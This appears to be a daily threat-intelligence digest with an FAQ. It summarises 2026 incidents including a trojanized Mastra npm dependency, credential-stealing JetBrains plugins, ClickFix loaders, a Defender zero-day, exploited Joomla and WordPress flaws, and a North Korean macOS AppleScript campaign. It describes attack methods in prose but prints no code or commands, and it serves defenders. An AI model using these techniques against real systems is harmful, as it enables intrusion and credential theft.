A single forgotten maintainer account can turn a trusted software supply chain into a high-speed credential leak. On cyware.com today, attackers repurposed Mastra’s npm packages with a trojanized dependency, exposing developer machines and CI/CD environments to infostealing malware in just 27 minutes. The breach highlights how dormant access can ripple through entire customer ecosystems.

A critical zero-day in Microsoft Defender, tracked as CVE-2026-50656, lets attackers escalate to SYSTEM privileges on Windows 10 and 11—even with Real-Time Protection enabled. The public release of the RoguePlanet exploit means any authenticated user can seize full device control, with no patch timeline yet announced.

On the macOS front, Sapphire Sleet is leveraging AppleScript and crafted .scpt files to bypass built-in protections and harvest credentials. Microsoft Threat Intelligence links the campaign to North Korean operators, with staged payloads exfiltrating data via the Telegram Bot API and establishing persistence through launch plists.

Top Malware Reported in the Last 24 Hours

Mastra npm packages ship stealthy infostealer

Mastra is an npm organization compromised to distribute a stealthy infostealer through malicious package updates. Mastra republished packages with a trojanized dependency, easy-day-js, where a postinstall hook fetched and executed a remote payload during installation. Mastra enables attackers to exploit dormant maintainer accounts, with one inactive for sixteen months, to infiltrate developer workflows. Mastra’s infection method targets Linux, macOS, and Windows environments by leveraging routine npm installs. Mastra exposes developer machines and CI/CD environments to browser and crypto-wallet extension data theft, with downstream impact on customers. Multiple firms—including SafeDep, Socket, StepSecurity, JFrog, Microsoft, and Endor Labs, published analysis as the attack unfolded in a 27-minute window.

Malicious JetBrains plugins siphon AI keys

At least 15 malicious plugins on the JetBrains Marketplace function as credential-stealing malware targeting AI API keys. The campaign includes lookalike tools such as DeepSeek AI Assist, DeepSeek Junit Test, and DeepSeek Git Commit, which transmit entered keys to a hardcoded server. The plugins offer “paid” users AI keys that may have been harvested from free users, turning development workflows into a credential exchange pipeline. The operation spans seven vendor accounts, with first uploads in October 2025 and new activity as recent as June 10, 2026. Aikido Security and BleepingComputer confirmed the credential-theft code.

ClickFix loaders widen ransomware delivery

ClickFix is a social-engineering malware loader expanding its arsenal with new variants—BabaDeda, Lorem Ipsum, and Potemkin. ClickFix tricks users into running attacker-provided commands, with new loaders supporting PowerShell execution, DLL side-loading, and domain generation for resilient command-and-control. ClickFix is linked to Vanilla Tempest, known for deploying Rhysida and BlackCat ransomware. ClickFix targets education, financial, architecture, legal services, and construction technology sectors. ClickFix campaigns often begin with a single employee running a “fix” and escalate to business disruption and extortion after additional payloads arrive.

Top Vulnerabilities Reported in Last 24 hours

Windows Defender zero-day grants SYSTEM privileges

CVE-2026-50656 is a privilege escalation vulnerability in Microsoft Defender (CVSS not specified) that allows authenticated attackers to gain SYSTEM-level privileges. Successful exploitation lets attackers take full control of affected Windows devices. CVE-2026-50656 is actively exploited, with a public proof-of-concept available. Nightmare Eclipse released the RoguePlanet exploit as part of a series targeting Microsoft products. The vulnerability affects Windows 10 and Windows 11, with no patch timeline announced.

Hackers seize Joomla sites via JCE

CVE-2026-48907 is a critical remote code execution vulnerability in the Joomla Content Editor (JCE) extension (CVSS 10.0). CVE-2026-48907 allows unauthenticated attackers to upload and execute PHP code, granting full site control. Attackers are actively exploiting CVE-2026-48907 in the wild. CSIRT Italia and CISA flagged the exploitation, and CISA added it to the Known Exploited Vulnerabilities catalog with a patch deadline of June 19, 2026 for FCEB agencies. The issue affects JCE versions 1.0.0 through 2.9.99.4, with a fix in 2.9.99.5.

Cloud fleet plunders WordPress SMTP secrets

CVE-2026-4020 is an unauthenticated credential disclosure vulnerability in the Gravity SMTP plugin for WordPress. CVE-2026-4020 allows attackers to steal SMTP credentials and API keys, putting email systems and connected services at risk. Attackers are actively exploiting CVE-2026-4020, with activity reported from February through June. Honeylabs linked the campaign to 3,158 IPs across 92 networks in 43 countries, including a Google Cloud “fleet,” and noted tracking via a unique JA4H hash. A fix is available in Gravity SMTP 2.1.5.

Top Threat Actors Reported in Last 24 hours

Sapphire Sleet targets Macs via AppleScript

Sapphire Sleet (a North Korean threat actor) is suspected to operate with a primary motive of credential theft and persistent access. Sapphire Sleet leverages AppleScript-based malware chains and delivers staged payloads via crafted .scpt files, keeping execution within Script Editor to evade built-in protections. Sapphire Sleet uses remote AppleScript stages piped into osascript, with mac-cur1 orchestrating and mac-cur2/mac-cur4 delivering a credential-harvester app that exfiltrates data via the Telegram Bot API. Sapphire Sleet targets businesses with developer, IT, or Mac-heavy teams. Sapphire Sleet’s campaign uses socially engineered “SDK update” lures and preserves user-initiated execution context, dynamically selecting payloads using user-agent identifiers such as mac-cur1 through mac-cur5. Microsoft Threat Intelligence discovered and documented the campaign.

Frequently Asked Questions

1. What is Mastra? Mastra’s npm organization was hit by a supply-chain compromise that pushed malicious updates into widely used packages, turning routine installs into an infostealer risk across Linux, macOS, and Windows. The intrusion republished Mastra packages with a trojanized dependency, easy-day-js, where a postinstall hook pulled down and launched a remote payload during installation.

2. What is ClickFix? The ClickFix social-engineering playbook is expanding again, with new loaders—BabaDeda, Lorem Ipsum, and Potemkin—used to pave the way for follow-on malware and ransomware. The technique tricks users into running attacker-provided commands, and these newer loaders add flexibility through methods like PowerShell execution, DLL side-loading, and domain generation for command-and-control resilience.

3. What is CVE-2026-50656? A critical zero-day in Microsoft Defender (CVE-2026-50656) lets an authenticated attacker on a Windows machine jump straight to SYSTEM-level privileges, effectively taking over the device. The “RoguePlanet” exploit abuses a race condition tied to improper link resolution before file access, and the published PoC works even when Microsoft Defender’s Real-Time Protection is enabled.

4. What is CVE-2026-48907? A critical flaw in the Joomla Content Editor (JCE) extension (CVE-2026-48907, CVSS 10.0) is being used to take over Joomla websites by uploading and running attacker-controlled PHP code. The attack path is blunt: unauthenticated attackers can create a new editor profile and then use it to push malicious code that grants full control of the site.

5. What is CVE-2026-4020? A coordinated operation is exploiting a flaw in the Gravity SMTP plugin for WordPress (CVE-2026-4020) to steal SMTP credentials and API keys without authentication, putting email systems and connected services at risk. Attackers are using the access to hunt for high-value configuration and secret files such as .env and .git/config, signaling a focus on credential harvesting rather than simple website vandalism.

6. What is Sapphire Sleet? Sapphire Sleet (a North Korean threat actor) is pushing a macOS malware chain that turns AppleScript into a stealthy delivery path, keeping execution inside Script Editor to sidestep many built-in protections. Microsoft Threat Intelligence says they use socially engineered “SDK update” lures delivered as crafted .scpt files, which fetch remote AppleScript stages and pipe them straight into osascript, letting the early stages run without being written to disk.